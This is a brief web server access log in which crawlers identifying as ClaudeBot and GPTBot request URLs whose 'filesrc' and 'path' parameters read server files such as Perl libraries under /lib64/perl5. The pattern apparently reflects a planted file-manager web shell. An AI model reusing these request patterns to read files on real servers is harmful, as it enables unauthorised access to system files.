216.73.216.225 - - [17/Jun/2025:09:12:55 -0400] "GET /abovecited/n1458199240.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.239 - - [17/Jun/2025:09:12:56 -0400] "GET /?filesrc=%2F%2Flib64%2Fperl5%2Farybase.pm&path=%2F%2Flib64%2Fperl5 HTTP/1.1" 200 3303 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:13:00 -0400] "GET /product/collect238?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fthemes%2Ftoivo-lite%2Flanguages HTTP/1.1" 301 2775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:13:01 -0400] "GET /umbrageousness/shopbrand/im1093068586.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Flicense.txt&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 9380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.239 - - [17/Jun/2025:09:13:01 -0400] "GET /?filesrc=%2F%2Flib64%2Fperl5%2Fendian.ph&path=%2F%2Flib64%2Fperl5 HTTP/1.1" 200 2714 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
